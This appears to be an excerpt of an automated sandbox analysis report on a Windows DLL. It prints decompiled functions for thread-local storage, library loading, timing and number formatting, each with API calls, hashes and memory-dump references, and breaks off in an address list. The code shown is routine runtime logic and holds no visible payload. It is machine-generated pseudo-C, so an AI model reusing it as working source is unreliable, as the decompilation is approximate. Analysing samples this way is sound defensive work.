String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
API String ID: 3228198226-3009553730
Opcode ID: a469dffdbd468513a449cd3dc53f031630e25456c81ea6a199c4fab2d6f2ae2b
Instruction ID: 55c09f24191c1bd620a80f4d5c6e868c5ab92f3b4656d42f08acf1df0d09bfc7
Opcode Fuzzy Hash: a469dffdbd468513a449cd3dc53f031630e25456c81ea6a199c4fab2d6f2ae2b
Instruction Fuzzy Hash: A34137B19002098FEB10CFE4D845BEEBBB4FB45318F104129EA19AB790DB799945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED342BC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED342BC(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x6ed6e860 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x6ed666b0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x6ed6e860 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x6ed6e860 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E6ED31EF8(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E6ED31EF8(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x6ed342c5
0x6ed3435a
0x6ed342cd
0x6ed342cf
0x6ed342d9
0x6ed342de
0x6ed342eb
0x6ed34300
0x6ed34304
0x6ed3436a
0x6ed3436f
0x6ed34376
0x6ed3437a
0x6ed3437d
0x6ed3437d
0x6ed34383
0x6ed34383
0x6ed34365
0x6ed34369
0x6ed34369
0x6ed34306
0x6ed3430f
0x6ed34348
0x6ed34355
0x6ed34357
0x6ed34357
0x00000000
0x6ed34357
0x6ed34319
0x6ed3431e
0x6ed34323
0x00000000
0x00000000
0x6ed3432d
0x6ed34332
0x6ed34337
0x00000000
0x00000000
0x6ed3433c
0x6ed34342
0x6ed34346
0x00000000
0x00000000
0x00000000
0x6ed34346
0x6ed342e3
0x00000000
0x00000000
0x00000000
0x6ed342e9
0x6ed34363
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,6ED343C9,FFFDC801,00000400,?,00000000,00000001,?,6ED34542,00000021,FlsSetValue,6ED66BF8,6ED66C00,?), ref: 6ED3437D

Strings

ext-ms-, xrefs: 6ED34327
api-ms-, xrefs: 6ED34313

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: e3d8d5e7f620eb822adc8b41cfa9fd289c691c39d1db993fe68098b6b68b6cfa
Instruction ID: e0890adb198c37dd96092070d1734b92f9398961a8179f2746073f4f2403793e
Opcode Fuzzy Hash: e3d8d5e7f620eb822adc8b41cfa9fd289c691c39d1db993fe68098b6b68b6cfa
Instruction Fuzzy Hash: DF21EB36A81631EBDB619BA5CC40A4EB768EB43360F350161ED65A7284D739ED07C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2F3BF, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6ED2F3BF(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6ed6d820 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6ED3057B(_t13, __eflags,  *0x6ed6d820);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6ED305B6(_t14, __eflags,  *0x6ed6d820, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6ED31CC1();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6ED305B6(_t18, __eflags,  *0x6ed6d820, 0);
								} else {
									_t8 = E6ED305B6(_t18, __eflags,  *0x6ed6d820, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6ED31C08(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6ed2f3bf
0x6ed2f3c6
0x6ed2f3d9
0x6ed2f3e0
0x6ed2f3e2
0x6ed2f3e3
0x6ed2f3e6
0x6ed2f3ff
0x6ed2f3ff
0x6ed2f3e8
0x6ed2f3e8
0x6ed2f3ea
0x6ed2f3f4
0x6ed2f3fb
0x6ed2f3fd
0x6ed2f404
0x6ed2f40d
0x6ed2f410
0x6ed2f411
0x6ed2f413
0x6ed2f427
0x6ed2f427
0x6ed2f430
0x6ed2f415
0x6ed2f41c
0x6ed2f422
0x6ed2f423
0x6ed2f425
0x6ed2f439
0x6ed2f43b
0x6ed2f43b
0x00000000
0x00000000
0x00000000
0x6ed2f425
0x6ed2f43e
0x00000000
0x00000000
0x00000000
0x6ed2f3fd
0x6ed2f3ea
0x6ed2f446
0x6ed2f450
0x6ed2f3c8
0x6ed2f3ca
0x6ed2f3ca

APIs

GetLastError.KERNEL32(00000001,?,6ED2F101,6ED2CFA2,6ED2C7AC,?,6ED2C9E4,?,00000001,?,?,00000001,?,6ED6AFA8,0000000C,6ED2CADD), ref: 6ED2F3CD
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6ED2F3DB
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6ED2F3F4
SetLastError.KERNEL32(00000000,6ED2C9E4,?,00000001,?,?,00000001,?,6ED6AFA8,0000000C,6ED2CADD,?,00000001,?), ref: 6ED2F446

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a0977831232b99e184fbf3a9bf7cb1c1196b30a827055439bcb24db817f970d0
Instruction ID: 26d46de0321375f77f880d55f84c2b7a3d3bd4dc9d1df7860f25d6e1570b0874
Opcode Fuzzy Hash: a0977831232b99e184fbf3a9bf7cb1c1196b30a827055439bcb24db817f970d0
Instruction Fuzzy Hash: C101DD3251DB229DFAB467F56C9855637A8DB477BC7300B39E610641D4FFA2880395A0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2BE60, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 6ED2C510: GetTickCount64.KERNEL32 ref: 6ED2C517

GetTickCount64.KERNEL32 ref: 6ED2BE96
GetTickCount64.KERNEL32 ref: 6ED2BEB4
GetTickCount64.KERNEL32 ref: 6ED2BECD
GetTickCount64.KERNEL32 ref: 6ED2BECF
GetTickCount64.KERNEL32 ref: 6ED2BED6
GetTickCount64.KERNEL32 ref: 6ED2BEF4

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: 1a81bb6d74baf54715301ab7a21c5d66a889107ca07045f373fd0b03cab00f03
Instruction ID: d32841aaa5249c02721e52091520d68aeb189ce3e294962861f11522fb629113
Opcode Fuzzy Hash: 1a81bb6d74baf54715301ab7a21c5d66a889107ca07045f373fd0b03cab00f03
Instruction Fuzzy Hash: FF019213C30E188DE243BAB9984155AA7AD6FE73E4F15CB23D10636056FFD054E387A2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED16B40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6ED16B40(short* __ecx, signed int __edx) {
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				short _t38;
				void* _t39;
				signed int _t45;
				short _t50;
				void* _t51;
				short _t52;
				signed int _t53;
				signed int _t62;
				unsigned int _t66;
				char* _t78;
				signed int _t85;
				signed short _t88;
				intOrPtr _t90;
				char* _t91;
				void* _t94;
				void* _t95;
				intOrPtr* _t96;

				_t96 = _t95 - 0x30;
				_t90 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t90 == 0) {
					L6:
					_t52 = 0;
					L7:
					return _t52;
				}
				_push(1);
				_t30 = E6ED11C10(_t90,  &M6ED5F3B9);
				_t96 = _t96 + 4;
				_t52 = 1;
				if(_t30 != 0) {
					goto L7;
				}
				if((__edx |  *(_t96 + 0x44)) == 0) {
					_push(1);
					return E6ED11C10(_t90, "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool");
				}
				 *_t96 = _t90;
				_t91 = 0;
				_t62 =  *((intOrPtr*)(__ecx + 0x18)) - __edx;
				asm("sbb esi, eax");
				if(_t62 >= 0) {
					__eflags = _t62 - 0x1a;
					asm("sbb eax, 0x0");
					if(_t62 >= 0x1a) {
						_t85 = _t62;
						_t78 = "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool";
						_push(1);
						_t34 = E6ED11C10( *_t96, _t78);
						_t96 = _t96 + 4;
						__eflags = _t34;
						if(_t34 != 0) {
							goto L7;
						}
						__eflags = _t85 - 0x2710;
						_t53 = _t85;
						asm("sbb eax, 0x0");
						if(_t85 < 0x2710) {
							_t36 = 0x27;
							L18:
							__eflags = _t53 - 0x63;
							if(_t53 > 0x63) {
								_t66 = _t53 & 0x0000ffff;
								_t53 = (_t66 >> 2) * 0x147b >> 0x11;
								 *((short*)(_t96 + _t36 + 6)) =  *((_t66 - _t53 * 0x00000064 & 0x0000ffff) + (_t66 - _t53 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
								_t36 = _t36 + 0xfffffffe;
								__eflags = _t36;
							}
							__eflags = _t53 - 0xa;
							if(_t53 >= 0xa) {
								_t24 = _t53 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899"; // 0x31303030
								 *((short*)(_t96 + _t36 + 6)) =  *(_t53 + _t24) & 0x0000ffff;
								_t37 = _t36 + 0xfffffffe;
								__eflags = _t37;
							} else {
								 *((char*)(_t96 + _t36 + 7)) = _t53 + 0x30;
								_t37 = _t36 - 1;
							}
							_push(0x27 - _t37);
							_push(_t96 + _t37 + 8);
							_push(0);
							_t38 = E6ED118D0( *_t96, 0x6ed5f570);
							_t96 = _t96 + 0xc;
							_t52 = _t38;
							goto L7;
						}
						_t39 = 0x27;
						do {
							_t94 = _t39;
							_t88 = E6ED2C5D0(_t53, _t91, 0x2710, 0);
							 *(_t96 + 4) = E6ED2C650(_t53, _t91, 0x2710, 0);
							_t45 = ((_t88 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
							_t8 = _t45 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899"; // 0x31303030
							__eflags = 0x5f5e0ff - _t53;
							_t53 =  *(_t96 + 4);
							asm("sbb ecx, esi");
							_t91 = _t78;
							 *((short*)(_t96 + _t94 + 4)) =  *(_t45 + _t8) & 0x0000ffff;
							 *((short*)(_t96 + _t94 + 6)) =  *((_t88 - _t45 * 0x00000064 & 0x0000ffff) + (_t88 - _t45 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
							_t16 = _t94 - 4; // 0x23
							_t39 = _t16;
						} while (__eflags < 0);
						goto L18;
					}
					 *((intOrPtr*)(_t96 + 8)) = _t62 + 0x61;
					_t50 = E6ED13490(_t96 + 8, _t96 + 8,  *_t96);
					_t96 = _t96 + 8;
					_t52 = _t50;
					goto L7;
				}
				_push(0x10);
				_t51 = E6ED11C10( *_t96,  &M6ED5F395);
				_t96 = _t96 + 4;
				if(_t51 != 0) {
					goto L7;
				}
				 *__ecx = 1;
				goto L6;
			}

0x6ed16b44
0x6ed16b47
0x6ed16b4c
0x6ed16b9c
0x6ed16b9c
0x6ed16b9e
0x00000000
0x6ed16ba0
0x6ed16b59
0x6ed16b5b
0x6ed16b60
0x6ed16b63
0x6ed16b67
0x00000000
0x00000000
0x6ed16b71
0x6ed16baf
0x00000000
0x6ed16bb6
0x6ed16b76
0x6ed16b79
0x6ed16b7b
0x6ed16b7d
0x6ed16b7f
0x6ed16bbb
0x6ed16bc0
0x6ed16bc3
0x6ed16be0
0x6ed16be5
0x6ed16bea
0x6ed16bec
0x6ed16bf1
0x6ed16bf4
0x6ed16bf6
0x00000000
0x00000000
0x6ed16bf8
0x6ed16c00
0x6ed16c02
0x6ed16c05
0x6ed16c80
0x6ed16c85
0x6ed16c85
0x6ed16c88
0x6ed16c8a
0x6ed16c98
0x6ed16cab
0x6ed16cb0
0x6ed16cb0
0x6ed16cb0
0x6ed16cb3
0x6ed16cb6
0x6ed16cc2
0x6ed16cca
0x6ed16ccf
0x6ed16ccf
0x6ed16cb8
0x6ed16cbb
0x6ed16cbf
0x6ed16cbf
0x6ed16ce5
0x6ed16ce6
0x6ed16ce7
0x6ed16ce9
0x6ed16cee
0x6ed16cf1
0x00000000
0x6ed16cf1
0x6ed16c07
0x6ed16c10
0x6ed16c10
0x6ed16c20
0x6ed16c30
0x6ed16c40
0x6ed16c46
0x6ed16c55
0x6ed16c57
0x6ed16c60
0x6ed16c62
0x6ed16c64
0x6ed16c74
0x6ed16c79
0x6ed16c79
0x6ed16c79
0x00000000
0x6ed16c7e
0x6ed16bcc
0x6ed16bd4
0x6ed16bd9
0x6ed16bdc
0x00000000
0x6ed16bdc
0x6ed16b89
0x6ed16b8b
0x6ed16b90
0x6ed16b95
0x00000000
0x00000000
0x6ed16b97
0x00000000

APIs

__aullrem.LIBCMT ref: 6ED16C1B
__aulldiv.LIBCMT ref: 6ED16C2B

Strings

'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ED16B54
_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6ED16BAA, 6ED16BE5
{invalid syntax}, xrefs: 6ED16B84

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
API String ID: 3839614884-2364648981
Opcode ID: f6609f6c5ecab88b795a2a9a280ce13433d2c0140af3552923546ffd0ef9df22
Instruction ID: 45d958aa2610a9f3626340996ce1465d0f14717421196c403971f5e0d026b4c4
Opcode Fuzzy Hash: f6609f6c5ecab88b795a2a9a280ce13433d2c0140af3552923546ffd0ef9df22
Instruction Fuzzy Hash: CB419DB171C2108BD7149BA8E940BAEB7D6DF94704F10483DE8C9DF3D5E676C85183A2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1D000, Relevance: 8.8, APIs: 7, Instructions: 85
memoryCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E6ED1D000(void* __ebx, void* __edi) {
				void _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				void* _v33;
				void* _v35;
				void* _v36;
				signed int _v39;
				void* _v44;
				long _v48;
				char _v76;
				void* __esi;
				long _t30;
				void* _t32;
				long _t33;
				void* _t35;
				void* _t37;
				void* _t38;
				signed char _t43;
				signed char _t44;
				signed int _t46;
				void** _t49;
				void* _t51;
				long _t53;
				void* _t55;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t65;
				void* _t67;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t89;
				void* _t90;
				void* _t91;

				_t77 = __edi;
				_t55 = __ebx;
				_push(_t79);
				_t30 =  *0x6ed6d04c; // 0x0
				if(_t30 == 0) {
					_t32 = TlsGetValue(E6ED22960(__ebx, 0x6ed6d04c, __edi, _t79));
					__eflags = _t32 - 1;
					if(_t32 <= 1) {
						goto L5;
					} else {
						goto L4;
					}
				} else {
					_t32 = TlsGetValue(_t30);
					if(_t32 > 1) {
						L4:
						__eflags =  *_t32 - 1;
						_t82 = _t32;
						if( *_t32 == 1) {
							goto L18;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t33 =  *0x6ed6d04c; // 0x0
						if(_t33 == 0) {
							_t35 = TlsGetValue(E6ED22960(_t55, 0x6ed6d04c, _t77, _t79));
							__eflags = _t35;
							if(_t35 != 0) {
								goto L7;
							} else {
								goto L10;
							}
						} else {
							_t35 = TlsGetValue(_t33);
							if(_t35 == 0) {
								L10:
								_t37 =  *0x6ed6e128; // 0x810000
								__eflags = _t37;
								if(_t37 != 0) {
									L13:
									_t38 = HeapAlloc(_t37, 0, 0xc);
									__eflags = _t38;
									if(__eflags == 0) {
										goto L20;
									} else {
										 *_t38 = 0;
										 *(_t38 + 8) = 0x6ed6d04c;
										_t82 = _t38;
										_t53 =  *0x6ed6d04c; // 0x0
										__eflags = _t53;
										if(_t53 == 0) {
											_t53 = E6ED22960(_t55, 0x6ed6d04c, _t77, _t82);
										}
										TlsSetValue(_t53, _t82);
										goto L17;
									}
								} else {
									_t37 = GetProcessHeap();
									__eflags = _t37;
									if(__eflags == 0) {
										L20:
										E6ED392F0(_t55, 0xc, 4, _t77, _t79, __eflags);
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t55);
										_push(_t77);
										_push(_t79);
										_t90 = _t89 - 0x38;
										_v36 = _t90;
										_v24 = 0xffffffff;
										_v28 = E6ED239B0;
										_v32 =  *[fs:0x0];
										 *[fs:0x0] =  &_v32;
										_v48 = 0xc;
										_v44 = 4;
										_v24 = 0;
										asm("movsd xmm0, [edx+0x10]");
										asm("movsd xmm2, [edx]");
										asm("movsd xmm1, [edx+0x8]");
										asm("movsd [ebp-0x34], xmm0");
										asm("movsd [ebp-0x3c], xmm1");
										asm("movsd [ebp-0x44], xmm2");
										_push( &_v76);
										E6ED12150( &_v48, 0x6ed5fba0);
										_t91 = _t90 + 4;
										_t43 = _v44;
										__eflags = _t43;
										if(_t43 == 0) {
											_t44 = 4;
											__eflags = 4 - 3;
											if(4 != 3) {
												_t61 = 0x6ed5fb98;
											} else {
												_t65 = _v36;
												_v48 = _t65;
												_v20 = 1;
												 *((intOrPtr*)( *((intOrPtr*)(_t65 + 4))))( *_t65);
												_t91 = _t91 + 4;
												_t49 = _v48;
												_t67 = _t49[1];
												__eflags =  *(_t67 + 4);
												if( *(_t67 + 4) != 0) {
													_t51 =  *_t49;
													__eflags =  *((intOrPtr*)(_t67 + 8)) - 9;
													if( *((intOrPtr*)(_t67 + 8)) >= 9) {
														_t51 =  *(_t51 - 4);
													}
													HeapFree( *0x6ed6e128, 0, _t51);
												}
												HeapFree( *0x6ed6e128, 0, _v36);
												_t61 = 0x6ed5fb98;
												_t44 = 4;
											}
											goto L32;
										} else {
											__eflags = _t43 - 4;
											if(_t43 != 4) {
												_t44 = _t43;
												_t63 = _v39;
											} else {
												_t61 = 0x6ed5fb98;
												_t44 = 2;
												L32:
												_t63 = _t61 << 0x00000018 | 0x00000028;
												__eflags = _t63;
											}
										}
										_t46 = _t44 & 0x000000ff | _t63 << 0x00000008;
										__eflags = _t46;
										 *[fs:0x0] = _v28;
										return _t46;
									} else {
										 *0x6ed6e128 = _t37;
										goto L13;
									}
								}
							} else {
								L7:
								_t80 = 0;
								if(_t35 != 1) {
									_t82 = _t35;
									L17:
									 *_t82 = 1;
									 *(_t82 + 4) = 0;
									L18:
									_t80 = _t82 + 4;
								}
								return _t80;
							}
						}
					}
				}
			}

0x6ed1d000
0x6ed1d000
0x6ed1d000
0x6ed1d001
0x6ed1d008
0x6ed1d023
0x6ed1d029
0x6ed1d02c
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d00a
0x6ed1d00b
0x6ed1d014
0x6ed1d02e
0x6ed1d02e
0x6ed1d031
0x6ed1d033
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d016
0x6ed1d039
0x6ed1d039
0x6ed1d040
0x6ed1d063
0x6ed1d069
0x6ed1d06b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1d042
0x6ed1d043
0x6ed1d04b
0x6ed1d06d
0x6ed1d06d
0x6ed1d072
0x6ed1d074
0x6ed1d084
0x6ed1d089
0x6ed1d08e
0x6ed1d090
0x00000000
0x6ed1d092
0x6ed1d092
0x6ed1d098
0x6ed1d09f
0x6ed1d0a1
0x6ed1d0a6
0x6ed1d0a8
0x6ed1d0af
0x6ed1d0af
0x6ed1d0b6
0x00000000
0x6ed1d0b6
0x6ed1d076
0x6ed1d076
0x6ed1d07b
0x6ed1d07d
0x6ed1d0d0
0x6ed1d0da
0x6ed1d0df
0x6ed1d0e1
0x6ed1d0e2
0x6ed1d0e3
0x6ed1d0e4
0x6ed1d0e5
0x6ed1d0e6
0x6ed1d0e7
0x6ed1d0e8
0x6ed1d0e9
0x6ed1d0ea
0x6ed1d0eb
0x6ed1d0ec
0x6ed1d0ed
0x6ed1d0ee
0x6ed1d0ef
0x6ed1d0f3
0x6ed1d0f4
0x6ed1d0f5
0x6ed1d0f6
0x6ed1d0f9
0x6ed1d0fc
0x6ed1d103
0x6ed1d114
0x6ed1d117
0x6ed1d120
0x6ed1d123
0x6ed1d127
0x6ed1d131
0x6ed1d136
0x6ed1d13a
0x6ed1d144
0x6ed1d149
0x6ed1d14e
0x6ed1d153
0x6ed1d154
0x6ed1d159
0x6ed1d15c
0x6ed1d15f
0x6ed1d161
0x6ed1d179
0x6ed1d17b
0x6ed1d17e
0x6ed1d1ef
0x6ed1d180
0x6ed1d180
0x6ed1d185
0x6ed1d18b
0x6ed1d193
0x6ed1d195
0x6ed1d198
0x6ed1d19b
0x6ed1d19e
0x6ed1d1a2
0x6ed1d1a4
0x6ed1d1a6
0x6ed1d1aa
0x6ed1d1ac
0x6ed1d1ac
0x6ed1d1b8
0x6ed1d1b8
0x6ed1d1c8
0x6ed1d1cd
0x6ed1d1d7
0x6ed1d1d7
0x00000000
0x6ed1d163
0x6ed1d163
0x6ed1d166
0x6ed1d1e3
0x6ed1d1ea
0x6ed1d168
0x6ed1d168
0x6ed1d172
0x6ed1d1f9
0x6ed1d1ff
0x6ed1d1ff
0x6ed1d1ff
0x6ed1d166
0x6ed1d20f
0x6ed1d20f
0x6ed1d211
0x6ed1d21f
0x6ed1d07f
0x6ed1d07f
0x00000000
0x6ed1d07f
0x6ed1d07d
0x6ed1d04d
0x6ed1d04d
0x6ed1d04d
0x6ed1d052
0x6ed1d054
0x6ed1d0bc
0x6ed1d0bc
0x6ed1d0c2
0x6ed1d0c9
0x6ed1d0c9
0x6ed1d0c9
0x6ed1d0cf
0x6ed1d0cf
0x6ed1d04b
0x6ed1d040
0x6ed1d014

APIs

TlsGetValue.KERNEL32(00000000,00000001,6ED1C746), ref: 6ED1D00B
TlsGetValue.KERNEL32(00000000,00000001,6ED1C746), ref: 6ED1D023
TlsGetValue.KERNEL32(00000000), ref: 6ED1D043
TlsGetValue.KERNEL32(00000000), ref: 6ED1D063
GetProcessHeap.KERNEL32 ref: 6ED1D076
HeapAlloc.KERNEL32(00810000,00000000,0000000C), ref: 6ED1D089
TlsSetValue.KERNEL32(00000000,00000000,00810000,00000000,0000000C), ref: 6ED1D0B6

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Heap$AllocProcess
String ID:
API String ID: 3559649508-0
Opcode ID: 0574a03347d6c986ce251e09e770edf5c387ceb1c43f81ee9d6dd9254745d3a6
Instruction ID: 4e4df38caf6e59266fd85600b1dce6cdce614eb24e1fa5c6f76a8d9999e98a16
Opcode Fuzzy Hash: 0574a03347d6c986ce251e09e770edf5c387ceb1c43f81ee9d6dd9254745d3a6
Instruction Fuzzy Hash: F7117274708611CFFF605BF5E854BA63398AB42246F100C28E905DB284DB39D847CF75

Uniqueness

Uniqueness Score: -1.00%

Function 6ED33571, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED33571(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E6ED34073(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E6ED333C8(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E6ED31F75(GetLastError());
									_t18 =  *((intOrPtr*)(E6ED31FCF()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E6ED33633(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6ED31F75(GetLastError());
						_t18 =  *((intOrPtr*)(E6ED31FCF()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E6ED33633(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6ED3365A(_a8);
				return 0;
			}

0x6ed33577
0x6ed3357c
0x6ed33593
0x6ed335c5
0x6ed335cf
0x6ed335e8
0x6ed335ee
0x6ed335fc
0x6ed33609
0x6ed33610
0x6ed33629
0x6ed3362c
0x6ed33612
0x6ed33619
0x6ed33624
0x6ed33624
